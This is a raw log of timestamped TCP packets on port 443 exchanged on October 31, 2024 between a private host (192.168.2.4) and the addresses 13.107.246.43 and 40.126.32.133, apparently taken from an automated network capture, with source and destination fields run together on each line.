                                                                                                                                            Oct 31, 2024 17:12:59.198899031 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.198905945 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.198934078 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.198954105 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.200046062 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.200067043 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.200105906 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.200114965 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.200136900 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.200150013 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.201212883 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.201247931 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.201287031 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.201293945 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.201313972 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.201333046 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.202347994 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.202400923 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.202408075 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.202414989 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.202450991 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.203810930 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.203831911 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.203877926 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.203886032 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.203896999 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.203918934 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.291902065 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.291991949 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.292005062 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.292062998 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.292201996 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.292220116 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.292232990 CET49767443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.292238951 CET4434976713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.345928907 CET49769443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.345966101 CET4434976913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.346050024 CET49769443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.346551895 CET49769443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.346566916 CET4434976913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.347404003 CET49770443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.347423077 CET49771443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.347430944 CET4434977113.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.347440958 CET4434977013.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.347497940 CET49771443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.347513914 CET49770443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.347661972 CET49771443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.347678900 CET4434977113.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.348468065 CET49772443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.348506927 CET4434977213.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.348566055 CET49772443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.348623037 CET49773443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.348651886 CET4434977313.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.348700047 CET49773443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.348829985 CET49770443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.348839045 CET4434977013.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.348978043 CET49772443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.348998070 CET4434977213.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.349023104 CET49773443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:12:59.349040031 CET4434977313.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.389805079 CET4434976840.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.390372992 CET49768443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:59.390398979 CET4434976840.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.391014099 CET49768443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:59.391026020 CET4434976840.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.391048908 CET49768443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:59.391056061 CET4434976840.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.771974087 CET4434976840.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.771997929 CET4434976840.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.772068024 CET49768443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:59.772093058 CET4434976840.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.772368908 CET49768443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:59.772382975 CET4434976840.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.772389889 CET49768443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:59.772545099 CET4434976840.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.772581100 CET4434976840.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.772623062 CET49768443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:59.798573017 CET49774443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:59.798626900 CET4434977440.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:59.798733950 CET49774443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:59.798903942 CET49774443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:12:59.798918009 CET4434977440.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.095330000 CET4434977313.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.096016884 CET49773443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.096049070 CET4434977313.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.096543074 CET49773443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.096549034 CET4434977313.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.101722002 CET4434977013.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.101878881 CET4434976913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.102098942 CET49770443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.102127075 CET4434977013.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.102483988 CET49770443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.102488041 CET4434977013.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.102718115 CET49769443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.102746964 CET4434976913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.103085995 CET49769443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.103092909 CET4434976913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.125072002 CET4434977213.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.126702070 CET49772443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.126732111 CET4434977213.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.127084017 CET49772443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.127089024 CET4434977213.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.129944086 CET4434977113.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.130192995 CET49771443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.130204916 CET4434977113.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.130558014 CET49771443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.130563021 CET4434977113.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.225178003 CET4434977313.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.225538969 CET4434977313.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.225599051 CET49773443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.232153893 CET4434977013.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.232213974 CET4434977013.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.232352018 CET4434977013.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.232391119 CET49770443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.232423067 CET49770443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.233937979 CET4434976913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.233983040 CET4434976913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.234033108 CET49769443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.234062910 CET4434976913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.234102011 CET49769443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.234498978 CET4434976913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.234551907 CET4434976913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.234623909 CET49769443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.235963106 CET49773443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.235982895 CET4434977313.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.236004114 CET49773443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.236010075 CET4434977313.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.238476038 CET49769443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.238493919 CET4434976913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.238504887 CET49769443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.238511086 CET4434976913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.272403002 CET4434977213.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.272423983 CET4434977213.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.272552967 CET49772443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.272622108 CET4434977213.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.274008989 CET4434977213.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.274091005 CET49772443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.338653088 CET49772443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.338704109 CET4434977213.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.338735104 CET49772443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.338752985 CET4434977213.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.341984034 CET49770443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.342010975 CET4434977013.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.342025042 CET49770443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.342030048 CET4434977013.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.486349106 CET4434977113.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.486541986 CET4434977113.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.486610889 CET49771443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.572015047 CET49771443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.572038889 CET4434977113.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.572050095 CET49771443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.572056055 CET4434977113.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.579246044 CET49775443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.579288960 CET4434977513.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.579360008 CET49775443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.580897093 CET49776443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.580915928 CET4434977613.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.580971956 CET49776443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.581298113 CET49775443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.581314087 CET4434977513.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.581804991 CET49776443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.581815958 CET4434977613.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.597776890 CET49777443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.597815990 CET4434977713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.597877979 CET49777443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.598042011 CET49777443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.598053932 CET4434977713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.602118015 CET49778443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.602133989 CET4434977813.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.602193117 CET49778443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.606460094 CET49779443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.606468916 CET4434977913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.606532097 CET49779443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.614401102 CET49778443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.614415884 CET4434977813.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:00.614509106 CET49779443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:00.614518881 CET4434977913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.006542921 CET4434977440.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.007122040 CET49774443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:13:01.007133007 CET4434977440.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.007817030 CET49774443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:13:01.007822037 CET4434977440.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.007857084 CET49774443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:13:01.007865906 CET4434977440.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.321377039 CET4434977713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.321947098 CET49777443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.321970940 CET4434977713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.322459936 CET49777443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.322463989 CET4434977713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.338474035 CET4434977813.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.338901997 CET49778443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.338915110 CET4434977813.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.339402914 CET49778443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.339409113 CET4434977813.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.345123053 CET4434977613.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.345527887 CET49776443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.345535994 CET4434977613.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.345921040 CET49776443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.345927954 CET4434977613.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.356812954 CET4434977913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.357412100 CET49779443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.357428074 CET4434977913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.358138084 CET49779443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.358141899 CET4434977913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.369466066 CET4434977513.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.378262043 CET49775443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.378278971 CET4434977513.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.378843069 CET49775443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.378849983 CET4434977513.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.449028015 CET4434977713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.449166059 CET4434977713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.449245930 CET49777443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.449402094 CET49777443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.449424982 CET4434977713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.449434996 CET49777443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.449440956 CET4434977713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.452521086 CET49780443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.452564001 CET4434978013.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.452651978 CET49780443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.452897072 CET49780443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.452919006 CET4434978013.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.467195034 CET4434977813.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.467437983 CET4434977813.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.467498064 CET49778443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.467549086 CET49778443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.467566013 CET4434977813.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.467577934 CET49778443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.467582941 CET4434977813.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.469854116 CET49781443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.469890118 CET4434978113.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.469968081 CET49781443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.470072031 CET49781443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.470082998 CET4434978113.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.476089954 CET4434977613.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.476258993 CET4434977613.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.476309061 CET49776443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.476332903 CET49776443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.476339102 CET4434977613.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.476347923 CET49776443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.476351976 CET4434977613.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.478292942 CET49782443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.478323936 CET4434978213.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.478384018 CET49782443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.478507996 CET49782443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.478516102 CET4434978213.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.486150026 CET4434977913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.486387968 CET4434977913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.486440897 CET49779443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.486489058 CET49779443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.486495018 CET4434977913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.486504078 CET49779443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.486506939 CET4434977913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.488481998 CET49783443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.488503933 CET4434978313.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.488586903 CET49783443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.488686085 CET49783443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.488692999 CET4434978313.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.510037899 CET4434977513.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.510189056 CET4434977513.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.510263920 CET49775443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.510360956 CET49775443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.510380983 CET4434977513.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.510396957 CET49775443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.510402918 CET4434977513.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.512828112 CET49784443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.512861013 CET4434978413.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.512937069 CET49784443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.513088942 CET49784443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:01.513101101 CET4434978413.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.610595942 CET4434977440.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.610618114 CET4434977440.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.610657930 CET4434977440.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.610825062 CET49774443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:13:01.610850096 CET4434977440.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.611228943 CET49774443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:13:01.611243963 CET4434977440.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.611252069 CET49774443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:13:01.611404896 CET4434977440.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.611443996 CET4434977440.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.611483097 CET49774443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:13:01.634628057 CET49785443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:13:01.634666920 CET4434978540.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:01.634756088 CET49785443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:13:01.634960890 CET49785443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:13:01.634974003 CET4434978540.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.176079035 CET4434978013.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.176732063 CET49780443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.176759005 CET4434978013.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.177405119 CET49780443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.177412033 CET4434978013.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.200593948 CET4434978113.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.201070070 CET49781443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.201086998 CET4434978113.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.201509953 CET49781443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.201514006 CET4434978113.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.225384951 CET4434978313.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.225833893 CET49783443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.225852013 CET4434978313.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.226288080 CET49783443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.226293087 CET4434978313.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.233608961 CET4434978213.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.233959913 CET49782443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.233979940 CET4434978213.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.234364986 CET49782443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.234369993 CET4434978213.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.256531000 CET4434978413.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.256853104 CET49784443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.256875038 CET4434978413.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.257242918 CET49784443192.168.2.413.107.246.43
